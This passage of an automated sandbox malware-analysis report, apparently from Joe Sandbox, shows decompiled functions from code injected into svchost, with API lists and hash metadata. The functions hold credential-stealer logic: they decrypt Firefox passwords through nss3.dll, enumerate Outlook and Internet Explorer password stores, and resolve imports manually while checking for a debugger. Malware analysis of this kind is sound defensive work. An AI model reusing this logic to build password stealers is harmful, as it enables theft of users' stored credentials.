                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: send
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                        • Opcode ID: 1f085b668f732ffcea280dda52a00ed8b6bbc1450afc8db2774cc2aef22cae63
                                                                                                                                        • Instruction ID: 93064508f8aa772a01ccf0e4fe0ab8d814429d9c8abed4184fec2c5da47e1b2f
                                                                                                                                        • Opcode Fuzzy Hash: 1f085b668f732ffcea280dda52a00ed8b6bbc1450afc8db2774cc2aef22cae63
                                                                                                                                        • Instruction Fuzzy Hash: 45E09B3263921466DB210D678C04B97B7DDDF81765F068235FA29E2050DA30D7518B70
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC0912B(CHAR* __eax) {
                                                                                                                                        				signed char _t4;
                                                                                                                                        
                                                                                                                                        				if(__eax == 0 ||  *__eax == 0) {
                                                                                                                                        					L5:
                                                                                                                                        					return 0;
                                                                                                                                        				} else {
                                                                                                                                        					_t4 = GetFileAttributesA(__eax); // executed
                                                                                                                                        					if(_t4 == 0xffffffff || (_t4 & 0x00000010) == 0) {
                                                                                                                                        						goto L5;
                                                                                                                                        					} else {
                                                                                                                                        						return 1;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,0BC06726), ref: 0BC09135
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: d6310c12133d18170fe43554cc665420d1d3a16e378b5dcca4399d025996463b
                                                                                                                                        • Instruction ID: 273f6ed116c28e156d8fbb487e20c2246a0685f694b2ee6e5b8f4f6c9160f08e
                                                                                                                                        • Opcode Fuzzy Hash: d6310c12133d18170fe43554cc665420d1d3a16e378b5dcca4399d025996463b
                                                                                                                                        • Instruction Fuzzy Hash: BCC002A0B7368159FB25153C484C3A626898B4A26BF690BE0A8B6D10E6EFB4C642D120
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08D3D(void* _a4) {
                                                                                                                                        				void* _t3;
                                                                                                                                        				void* _t4;
                                                                                                                                        
                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                        					_t4 = LocalFree(_a4); // executed
                                                                                                                                        					return _t4;
                                                                                                                                        				}
                                                                                                                                        				return _t3; // _t3 is never assigned in the decompilation: the binary returns whatever is left in eax
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2826327444-0
                                                                                                                                        • Opcode ID: a0835796c4dbf97950b2f5322763f556b284501a291b9e1deb496a58eebb2258
                                                                                                                                        • Instruction ID: 9455c5d60ef590c0d68d140232a20b40a7c58136e3b0c6aca8f02e873d4ad952
                                                                                                                                        • Opcode Fuzzy Hash: a0835796c4dbf97950b2f5322763f556b284501a291b9e1deb496a58eebb2258
                                                                                                                                        • Instruction Fuzzy Hash: 6DB09230021A0CEBCB051F54E8087A93FE8FB00649F488220B90C084B0CB72A7A1CA90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08D51(void* __eax) {
                                                                                                                                        				void* _t3;
                                                                                                                                        
                                                                                                                                        				_t3 = LocalAlloc(0x40, __eax - 0xffffff80); // executed; 0x40 = LPTR (fixed, zero-initialised), size is __eax + 0x80
                                                                                                                                        				return _t3;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                        • Opcode ID: 58aa0496ac6d45fa6fa0775f0dd793cea567e80eeb7479e19074cd84430951c2
                                                                                                                                        • Instruction ID: 1fbeeca49b2448152b81154e2c2aba7279835e6eaaaaadb4dd1a2fca89c4965c
                                                                                                                                        • Opcode Fuzzy Hash: 58aa0496ac6d45fa6fa0775f0dd793cea567e80eeb7479e19074cd84430951c2
                                                                                                                                        • Instruction Fuzzy Hash: 63A022B08200002AFC000A382E0EF223EA8CB02320F000300F328F00C8C2208200C02C
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Non-executed Functions

                                                                                                                                        C-Code - Quality: 48%
                                                                                                                                        			E0BC061DF(CHAR* __ebx, void* __ecx, CHAR* _a4) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				int _t8;
                                                                                                                                        				intOrPtr* _t20;
                                                                                                                                        				signed int _t21;
                                                                                                                                        				signed int _t23;
                                                                                                                                        				char* _t28;
                                                                                                                                        				CHAR* _t29;
                                                                                                                                        				struct HINSTANCE__* _t35;
                                                                                                                                        				intOrPtr _t48;
                                                                                                                                        				intOrPtr _t49;
                                                                                                                                        				intOrPtr _t50;
                                                                                                                                        				intOrPtr _t51;
                                                                                                                                        
                                                                                                                                        				_t29 = __ebx;
                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                        				 *0xbc10d14 =  *0xbc10d14 & 0x00000000;
                                                                                                                                        				_t8 = lstrlenA(__ebx);
                                                                                                                                        				if(_t8 > 2) {
                                                                                                                                        					_t28 = _t8 + __ebx - 2;
                                                                                                                                        					if( *_t28 == 0x5c5c) {
                                                                                                                                        						 *_t28 = 0x5c;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				SetCurrentDirectoryA(_a4);
                                                                                                                                        				_t35 = LoadLibraryA("nss3.dll");
                                                                                                                                        				 *0xbc10d28 = GetProcAddress(_t35, "NSS_Init");
                                                                                                                                        				 *0xbc10d10 = GetProcAddress(_t35, "PK11_GetInternalKeySlot");
                                                                                                                                        				 *0xbc10d3c = GetProcAddress(_t35, "PK11_Authenticate");
                                                                                                                                        				 *0xbc10d30 = GetProcAddress(_t35, "PK11SDR_Decrypt");
                                                                                                                                        				 *0xbc10d5c = GetProcAddress(_t35, "NSSBase64_DecodeBuffer");
                                                                                                                                        				 *0xbc10d34 = GetProcAddress(_t35, "PK11_CheckUserPassword");
                                                                                                                                        				 *0xbc10d44 = GetProcAddress(_t35, "SECITEM_FreeItem");
                                                                                                                                        				 *0xbc10d50 = GetProcAddress(_t35, "NSS_Shutdown");
                                                                                                                                        				 *0xbc10d24 = GetProcAddress(_t35, "PK11_FreeSlot");
                                                                                                                                        				_t20 =  *0xbc10d28; // 0x0
                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                        					L15:
                                                                                                                                        					_t21 = 0;
                                                                                                                                        					L16:
                                                                                                                                        					return _t21;
                                                                                                                                        				}
                                                                                                                                        				_t48 =  *0xbc10d10; // 0x0
                                                                                                                                        				if(_t48 == 0) {
                                                                                                                                        					goto L15;
                                                                                                                                        				}
                                                                                                                                        				_t49 =  *0xbc10d50; // 0x0
                                                                                                                                        				if(_t49 == 0) {
                                                                                                                                        					goto L15;
                                                                                                                                        				}
                                                                                                                                        				_t50 =  *0xbc10d3c; // 0x0
                                                                                                                                        				if(_t50 == 0) {
                                                                                                                                        					goto L15;
                                                                                                                                        				}
                                                                                                                                        				_t51 =  *0xbc10d5c; // 0x0
                                                                                                                                        				if(_t51 == 0) {
                                                                                                                                        					goto L15;
                                                                                                                                        				}
                                                                                                                                        				_push(_t29);
                                                                                                                                        				if( *_t20() == 0) {
                                                                                                                                        					_t23 =  *0xbc10d10();
                                                                                                                                        					 *0xbc10d14 = _t23;
                                                                                                                                        					if(_t23 == 0) {
                                                                                                                                        						 *0xbc10d50();
                                                                                                                                        					}
                                                                                                                                        					_push(0);
                                                                                                                                        					_push(1);
                                                                                                                                        					_push( *0xbc10d14);
                                                                                                                                        					if( *0xbc10d3c() == 0) {
                                                                                                                                        						_v8 = 1;
                                                                                                                                        					} else {
                                                                                                                                        						 *0xbc10d24( *0xbc10d14);
                                                                                                                                        						 *0xbc10d50();
                                                                                                                                        						 *0xbc10d14 = 0;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				_t21 = _v8;
                                                                                                                                        				goto L16;
                                                                                                                                        			}
















                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32 ref: 0BC061EF
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 0BC06211
                                                                                                                                        • LoadLibraryA.KERNEL32(nss3.dll), ref: 0BC0621C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 0BC06230
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 0BC0623D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 0BC0624A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 0BC06257
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 0BC06264
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_CheckUserPassword), ref: 0BC06271
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 0BC0627E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0BC0628B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 0BC06298
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CurrentDirectoryLibraryLoadlstrlen
                                                                                                                                        • String ID: NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll
                                                                                                                                        • API String ID: 3685612757-1564949615
                                                                                                                                        • Opcode ID: 5fc6a67ae3e67396f78779a94e843d4baa954fd741b03378f0f13072114171dd
                                                                                                                                        • Instruction ID: 15f236f2910cf940f675c01126528f6cced81d64b2fa67089fd6d7e87e47088b
                                                                                                                                        • Opcode Fuzzy Hash: 5fc6a67ae3e67396f78779a94e843d4baa954fd741b03378f0f13072114171dd
                                                                                                                                        • Instruction Fuzzy Hash: B8310F70D61215DBC7206FA6DC49A1A7FF8FB47A11B908D2AF401E6191DF74E780CEA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E0BC09FDC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                        				intOrPtr _v0;
                                                                                                                                        				void* _v804;
                                                                                                                                        				intOrPtr _v808;
                                                                                                                                        				intOrPtr _v812;
                                                                                                                                        				intOrPtr _t6;
                                                                                                                                        				intOrPtr _t11;
                                                                                                                                        				intOrPtr _t12;
                                                                                                                                        				intOrPtr _t13;
                                                                                                                                        				long _t17;
                                                                                                                                        				intOrPtr _t21;
                                                                                                                                        				intOrPtr _t22;
                                                                                                                                        				intOrPtr _t25;
                                                                                                                                        				intOrPtr _t26;
                                                                                                                                        				intOrPtr _t27;
                                                                                                                                        				intOrPtr* _t31;
                                                                                                                                        				void* _t34;
                                                                                                                                        
                                                                                                                                        				_t27 = __esi;
                                                                                                                                        				_t26 = __edi;
                                                                                                                                        				_t25 = __edx;
                                                                                                                                        				_t22 = __ecx;
                                                                                                                                        				_t21 = __ebx;
                                                                                                                                        				_t6 = __eax;
                                                                                                                                        				_t34 = _t22 -  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                        					asm("repe ret");
                                                                                                                                        				}
                                                                                                                                        				 *0xbc10ae8 = _t6;
                                                                                                                                        				 *0xbc10ae4 = _t22;
                                                                                                                                        				 *0xbc10ae0 = _t25;
                                                                                                                                        				 *0xbc10adc = _t21;
                                                                                                                                        				 *0xbc10ad8 = _t27;
                                                                                                                                        				 *0xbc10ad4 = _t26;
                                                                                                                                        				 *0xbc10b00 = ss;
                                                                                                                                        				 *0xbc10af4 = cs;
                                                                                                                                        				 *0xbc10ad0 = ds;
                                                                                                                                        				 *0xbc10acc = es;
                                                                                                                                        				 *0xbc10ac8 = fs;
                                                                                                                                        				 *0xbc10ac4 = gs;
                                                                                                                                        				asm("pushfd");
                                                                                                                                        				_pop( *0xbc10af8);
                                                                                                                                        				 *0xbc10aec =  *_t31;
                                                                                                                                        				 *0xbc10af0 = _v0;
                                                                                                                                        				 *0xbc10afc =  &_a4;
                                                                                                                                        				 *0xbc10a38 = 0x10001;
                                                                                                                                        				_t11 =  *0xbc10af0; // 0x0
                                                                                                                                        				 *0xbc109ec = _t11;
                                                                                                                                        				 *0xbc109e0 = 0xc0000409;
                                                                                                                                        				 *0xbc109e4 = 1;
                                                                                                                                        				_t12 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v812 = _t12;
                                                                                                                                        				_t13 =  *0xbc10004; // 0x44bf19b1
                                                                                                                                        				_v808 = _t13;
                                                                                                                                        				 *0xbc10a30 = IsDebuggerPresent();
                                                                                                                                        				_push(1);
                                                                                                                                        				E0BC0A0F4(_t14);
                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                        				_t17 = UnhandledExceptionFilter(0xbc0c200);
                                                                                                                                        				if( *0xbc10a30 == 0) {
                                                                                                                                        					_push(1);
                                                                                                                                        					E0BC0A0F4(_t17);
                                                                                                                                        				}
                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0BC0A0A9
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0BC0A0BE
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0BC0C200), ref: 0BC0A0C9
                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0BC0A0E5
                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0BC0A0EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                        • Opcode ID: 06c3e7a6e9e27c15c153936e52d95404f8f8335307ca848949e51ff0fd3abc80
                                                                                                                                        • Instruction ID: cdc996cac05d7a56d2ddbb2a388c6ebf975a6b92f7d4aeffdda3cc2aa04f9785
                                                                                                                                        • Opcode Fuzzy Hash: 06c3e7a6e9e27c15c153936e52d95404f8f8335307ca848949e51ff0fd3abc80
                                                                                                                                        • Instruction Fuzzy Hash: 7821A0B5A62204DFD740DF69E545B493BE4FB0A314F81495AF509A7A80DBB0DBC0CF15
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                        			E0BC09DF5(signed int __ecx) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				char _v10;
                                                                                                                                        				short _v12;
                                                                                                                                        				intOrPtr _v16;
                                                                                                                                        				char _v20;
                                                                                                                                        				short _v24;
                                                                                                                                        				intOrPtr _v28;
                                                                                                                                        				intOrPtr _v32;
                                                                                                                                        				intOrPtr _v36;
                                                                                                                                        				char _v40;
                                                                                                                                        				char _v42;
                                                                                                                                        				short _v44;
                                                                                                                                        				intOrPtr _v48;
                                                                                                                                        				intOrPtr _v52;
                                                                                                                                        				intOrPtr _v56;
                                                                                                                                        				intOrPtr _v60;
                                                                                                                                        				char _v64;
                                                                                                                                        				char _v68;
                                                                                                                                        				intOrPtr _v72;
                                                                                                                                        				intOrPtr _v76;
                                                                                                                                        				intOrPtr _v80;
                                                                                                                                        				intOrPtr _v84;
                                                                                                                                        				intOrPtr _v88;
                                                                                                                                        				intOrPtr _v92;
                                                                                                                                        				intOrPtr _v96;
                                                                                                                                        				char _v100;
                                                                                                                                        				signed int _v104;
                                                                                                                                        				signed int _v108;
                                                                                                                                        				signed int _v112;
                                                                                                                                        				intOrPtr _v116;
                                                                                                                                        				char _v120;
                                                                                                                                        				intOrPtr _v124;
                                                                                                                                        				intOrPtr _v128;
                                                                                                                                        				intOrPtr _v132;
                                                                                                                                        				char _v140;
                                                                                                                                        				char _v148;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t69;
                                                                                                                                        				intOrPtr _t74;
                                                                                                                                        				intOrPtr _t83;
                                                                                                                                        				signed int _t84;
                                                                                                                                        				signed int _t92;
                                                                                                                                        				signed int _t93;
                                                                                                                                        				signed int _t95;
                                                                                                                                        				signed int _t105;
                                                                                                                                        				signed int _t113;
                                                                                                                                        
                                                                                                                                        				_t69 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t69 ^ _t113;
                                                                                                                                        				_t109 =  *( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c)) + 8);
                                                                                                                                        				_t111 = __ecx;
                                                                                                                                        				_v108 = __ecx;
                                                                                                                                        				_v20 = 0x4c72644c;
                                                                                                                                        				_v16 = 0x4464616f;
                                                                                                                                        				_v12 = 0x6c6c;
                                                                                                                                        				_v10 = 0;
                                                                                                                                        				_v100 = 0x436c7452;
                                                                                                                                        				_v96 = 0x74616572;
                                                                                                                                        				_v92 = 0x696e5565;
                                                                                                                                        				_v88 = 0x65646f63;
                                                                                                                                        				_v84 = 0x69727453;
                                                                                                                                        				_v80 = 0x7246676e;
                                                                                                                                        				_v76 = 0x73416d6f;
                                                                                                                                        				_v72 = 0x7a696963;
                                                                                                                                        				_v68 = 0;
                                                                                                                                        				_v64 = 0x4772644c;
                                                                                                                                        				_v60 = 0x72507465;
                                                                                                                                        				_v56 = 0x6465636f;
                                                                                                                                        				_v52 = 0x41657275;
                                                                                                                                        				_v48 = 0x65726464;
                                                                                                                                        				_v44 = 0x7373;
                                                                                                                                        				_v42 = 0;
                                                                                                                                        				_v40 = 0x496c7452;
                                                                                                                                        				_v36 = 0x4174696e;
                                                                                                                                        				_v32 = 0x5369736e;
                                                                                                                                        				_v28 = 0x6e697274;
                                                                                                                                        				_v24 = 0x67;
                                                                                                                                        				_t116 = _t109;
                                                                                                                                        				if(_t109 == 0) {
                                                                                                                                        					L19:
                                                                                                                                        					_t74 = 0;
                                                                                                                                        					__eflags = 0;
                                                                                                                                        				} else {
                                                                                                                                        					_v124 = E0BC09D48(_t116, _t109,  &_v20);
                                                                                                                                        					_t33 =  &_v100; // 0x436c7452
                                                                                                                                        					_v132 = E0BC09D48(_t116, _t109, _t33);
                                                                                                                                        					_t35 =  &_v64; // 0x4772644c
                                                                                                                                        					_v116 = E0BC09D48(_t116, _t109, _t35);
                                                                                                                                        					_t37 =  &_v40; // 0x496c7452
                                                                                                                                        					_t83 = E0BC09D48(_t116, _t109, _t37);
                                                                                                                                        					_t107 = 1;
                                                                                                                                        					_t109 =  &_v104;
                                                                                                                                        					_v128 = _t83;
                                                                                                                                        					_t84 = E0BC09D03(1,  &_v104, _t111);
                                                                                                                                        					if(_v104 <= 0x14) {
                                                                                                                                        						goto L19;
                                                                                                                                        					} else {
                                                                                                                                        						_t111 = _t84;
                                                                                                                                        						_v104 = _t111;
                                                                                                                                        						if( *_t84 == 0) {
                                                                                                                                        							L18:
                                                                                                                                        							_t74 = 1;
                                                                                                                                        						} else {
                                                                                                                                        							while(1) {
                                                                                                                                        								_push( *((intOrPtr*)(_t111 + 0xc)) + _v108);
                                                                                                                                        								_push( &_v140);
                                                                                                                                        								if(_v132() == 0) {
                                                                                                                                        									goto L19;
                                                                                                                                        								}
                                                                                                                                        								_push( &_v120);
                                                                                                                                        								_push( &_v140);
                                                                                                                                        								_push(0);
                                                                                                                                        								_push(0);
                                                                                                                                        								if(_v124() != 0) {
                                                                                                                                        									goto L19;
                                                                                                                                        								} else {
                                                                                                                                        									_t109 =  *_t111 + _v108;
                                                                                                                                        									_t111 =  *((intOrPtr*)(_t111 + 0x10)) + _v108;
                                                                                                                                        									while(1) {
                                                                                                                                        										_t92 =  *_t109;
                                                                                                                                        										if(_t92 == 0) {
                                                                                                                                        											break;
                                                                                                                                        										}
                                                                                                                                        										_t105 = 0;
                                                                                                                                        										__eflags = _t92;
                                                                                                                                        										if(_t92 >= 0) {
                                                                                                                                        											_t107 = _v108;
                                                                                                                                        											_t93 = _t92 + _v108 + 2;
                                                                                                                                        										} else {
                                                                                                                                        											_t93 = _t92 & 0x0000ffff;
                                                                                                                                        											_t105 = 1;
                                                                                                                                        										}
                                                                                                                                        										_v112 = 0;
                                                                                                                                        										__eflags = _t105;
                                                                                                                                        										if(_t105 != 0) {
                                                                                                                                        											_push( &_v112);
                                                                                                                                        											_push(_t93);
                                                                                                                                        											_push(0);
                                                                                                                                        										} else {
                                                                                                                                        											_v128( &_v148, _t93);
                                                                                                                                        											_push( &_v112);
                                                                                                                                        											_push(0);
                                                                                                                                        											_push( &_v148);
                                                                                                                                        										}
                                                                                                                                        										_v116(_v120);
                                                                                                                                        										_t95 = _v112;
                                                                                                                                        										__eflags = _t95;
                                                                                                                                        										if(_t95 == 0) {
                                                                                                                                        											goto L19;
                                                                                                                                        										} else {
                                                                                                                                        											 *_t111 = _t95;
                                                                                                                                        											_t109 =  &(_t109[1]);
                                                                                                                                        											_t111 = _t111 + 4;
                                                                                                                                        											__eflags = _t111;
                                                                                                                                        											continue;
                                                                                                                                        										}
                                                                                                                                        										goto L20;
                                                                                                                                        									}
                                                                                                                                        									_v104 = _v104 + 0x14;
                                                                                                                                        									if( *_v104 != 0) {
                                                                                                                                        										_t111 = _v104;
                                                                                                                                        										continue;
                                                                                                                                        									} else {
                                                                                                                                        										goto L18;
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        								goto L20;
                                                                                                                                        							}
                                                                                                                                        							goto L19;
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				L20:
                                                                                                                                        				return E0BC09FDC(_t74, 0, _v8 ^ _t113, _t107, _t109, _t111);
                                                                                                                                        			}

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrGetProcedureAddressRtlInitAnsiStringLdrLoadDll$RtlCreateUnicodeStringFromAsciiz$ll$oadD
                                                                                                                                        • API String ID: 0-3329835957
                                                                                                                                        • Opcode ID: 8284fc9a10188ebac1a68dacfcc85b9413b508cc2e2aca1cecd542ac080aa454
                                                                                                                                        • Instruction ID: 4d34d09f432e9f4e4972f8c1a59adcbe827332905b658a334a2b7902f3ca9976
                                                                                                                                        • Opcode Fuzzy Hash: 8284fc9a10188ebac1a68dacfcc85b9413b508cc2e2aca1cecd542ac080aa454
                                                                                                                                        • Instruction Fuzzy Hash: 4D5106B1D203089FCF11CFD9C981AEEBBB9BF05600F648069E515AB242DB70AA45CF55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.20%

                                                                                                                                        C-Code - Quality: 34%
                                                                                                                                        			E0BC05E3A(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				char _v1032;
                                                                                                                                        				char _v2056;
                                                                                                                                        				char _v3080;
                                                                                                                                        				char _v3084;
                                                                                                                                        				intOrPtr _v3088;
                                                                                                                                        				short* _v3092;
                                                                                                                                        				char _v3096;
                                                                                                                                        				char _v3100;
                                                                                                                                        				intOrPtr _v3104;
                                                                                                                                        				int _v3108;
                                                                                                                                        				int _v3112;
                                                                                                                                        				intOrPtr _v3116;
                                                                                                                                        				char _v3120;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t46;
                                                                                                                                        				void* _t68;
                                                                                                                                        				intOrPtr _t85;
                                                                                                                                        				signed int _t87;
                                                                                                                                        
                                                                                                                                        				_t46 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t46 ^ _t87;
                                                                                                                                        				_v3088 = _a8;
                                                                                                                                        				_t73 = _a20;
                                                                                                                                        				_v3092 = _a12;
                                                                                                                                        				_v3104 = _a16;
                                                                                                                                        				_t85 = _a4;
                                                                                                                                        				E0BC0491E(_t73, __ecx, _t85,  &_v2056);
                                                                                                                                        				_push(0);
                                                                                                                                        				_push( &_v3100);
                                                                                                                                        				_push(_v3088);
                                                                                                                                        				_push(_t85);
                                                                                                                                        				_push(0);
                                                                                                                                        				_push(_t73);
                                                                                                                                        				if( *((intOrPtr*)( *_t73 + 0x28))() >= 0) {
                                                                                                                                        					WideCharToMultiByte(0, 0,  *(_v3100 + 4), 0xffffffff,  &_v1032, 0x3ff, 0, 0);
                                                                                                                                        					__imp__CoTaskMemFree(_v3100);
                                                                                                                                        				}
                                                                                                                                        				WideCharToMultiByte(0, 0, _v3092, 0xffffffff,  &_v3080, 0x3ff, 0, 0);
                                                                                                                                        				_v3120 = 0x10;
                                                                                                                                        				_v3116 = 2;
                                                                                                                                        				_v3112 = 0;
                                                                                                                                        				_v3108 = 0;
                                                                                                                                        				_t59 =  *((intOrPtr*)( *_t73 + 0x44))(_t73, 0, _t85, _v3088, _v3092,  &_v3096,  &_v3084,  &_v3120, 0);
                                                                                                                                        				if(_v3096 != 0 && _v3084 != 0) {
                                                                                                                                        					_t85 = lstrcmpiA;
                                                                                                                                        					if(lstrcmpiA( &_v2056, "identification") == 0 || lstrcmpiA( &_v2056, "identitymgr") == 0) {
                                                                                                                                        						if(lstrcmpiA( &_v1032, "inetcomm server passwords") != 0) {
                                                                                                                                        							if(lstrcmpiA( &_v1032, "outlook account manager passwords") != 0) {
                                                                                                                                        								if(lstrcmpiA( &_v1032, "identities") != 0) {
                                                                                                                                        									goto L10;
                                                                                                                                        								} else {
                                                                                                                                        									_push(0);
                                                                                                                                        									_push(_v3088);
                                                                                                                                        									_push(_v3092);
                                                                                                                                        									_push(0xbeef0007);
                                                                                                                                        									goto L9;
                                                                                                                                        								}
                                                                                                                                        							} else {
                                                                                                                                        								_t68 = 0xbeef0006;
                                                                                                                                        								goto L8;
                                                                                                                                        							}
                                                                                                                                        							L16:
                                                                                                                                        						} else {
                                                                                                                                        							_t68 = 0xbeef0005;
                                                                                                                                        							L8:
                                                                                                                                        							_push(1);
                                                                                                                                        							_push(_v3088);
                                                                                                                                        							_push(_v3092);
                                                                                                                                        							_push(_t68);
                                                                                                                                        							L9:
                                                                                                                                        							_t73 = _v3104;
                                                                                                                                        							_t84 = _v3096;
                                                                                                                                        							_t59 = E0BC05D2B(_v3104, _v3084, _v3096);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					L10:
                                                                                                                                        					__imp__CoTaskMemFree(_v3084);
                                                                                                                                        				}
                                                                                                                                        				return E0BC09FDC(_t59, _t73, _v8 ^ _t87, _t84, _t85, 0);
                                                                                                                                        				goto L16;
                                                                                                                                        			}

                                                                                                                                        APIs
